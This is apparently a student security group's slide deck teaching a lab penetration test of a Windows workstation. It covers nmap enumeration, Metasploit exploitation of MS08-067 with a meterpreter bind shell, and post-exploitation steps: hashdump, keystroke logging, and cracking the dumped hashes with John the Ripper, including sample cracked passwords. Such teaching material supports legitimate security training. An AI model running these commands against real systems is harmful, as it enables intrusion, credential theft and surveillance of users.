Upload
chastity-shields
View
212
Download
0
Embed Size (px)
Citation preview
Penetration Testing 101
(Boot-camp)
Computer Security GroupMitchell Adair
utdcsg.org
Outline
“Interactive” meeting Introduction to Backtrack
A mini penetration test Scenario Methodology
Enumeration, Exploitation, Post Exploitation Exercise Summary Resources
Scenario
Company X wants you to test if their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations.
You take it back to the lab and begin to test it...
Outline
Enumeration OS, services, versions, filters
Exploitation Match a service + version to a known vulnerability Exploit, getting shell access to the box
Post Exploitation Shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot, …
Enumeration
'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org
nmap [Scan Type(s)] [Options] {target specification}
Scan Types -sS, Syn -sT, Connect -sA, Ack …
Options -O, OS -sV, services -v, verbose …
… Enumeration
nmap 192.168.1.1 Default scan, full SYN, top 1000 ports
nmap -v -sV -O 192.168.1.1 -p 1-65535 Verbose, services, OS, ports 1 through 65535
nmap -PN --script=smb* -sV -O 192.168.1.1 Don't ping, run all smb* scripts, service, OS
Nmap OutputNot shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)...OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1 ...Host script results:| smb-os-discovery: Windows 2000| smb-enum-domains: | Domain: MITCHELL-32D5C5| |_ SID: S-1-5-21-606747145-1647877149-725345543| |_ Users: add, Administrator, Guest, s3cr3tus3r, sally... | Anonymous shares: IPC$|_ Restricted shares: ADMIN$, C$...| smb-check-vulns:|_ MS08-067: VULNERABLE
Exploitation
Metasploit – Penetration Testing Framework tools, libraries, modules, and user interfaces
# msfconsole msf >
use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) >
set RHOST 192.168.1.1 set PAYLOAD windows/meterpreter/bind_tcp exploit
Post Exploitation Gather useful information
SSH & GPG keys, hashes, etc... Meterpreter “post” modules
Pivot meterpreter > hashdump
sysinfo keyscan_(start | stop | dump) download migrate shell
… Post Exploitation
We dumped the hashes... now what? Pass the hash Crack the hash
John the Ripper a tool to find weak passwords of your users
John [options] password-files --wordlist --users, --groups --session, --restore
… Post Exploitation
John --wordlist=/.../password.lst /tmp/hashes.txt
Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX])
ABC123 (sally)SECRET (s3cr3tus3r) (Guest)BASKETB (webmaster:1)ALL (webmaster:2)ADMIN1 (Administrator)
guesses: 5 time: 0:00:00:00 100% c/s: 25730 trying: SKIDOO - ZHONGGU
So... let's get started
Boot up to your Backtrack CD passwd /etc/init.d/networking start startx Follow along... let's pwn this box :)
Summary
Clearly... Company X's default user workstations needs some work.
Now let's do the paperwork!... just kidding ;) Hopefully this gives everyone a hands on
introduction to Backtrack, some essential tools, and the attacker's mindset & process. Feedback is always appreciated!
Resources
utdcsg.org Presentations, articles, resources, etc. IRC - irc.oftc.net, #utdcsg
Nmap - nmap.org/5/ Metasploit - metasploit.com/ John the Ripper - openwall.com/john/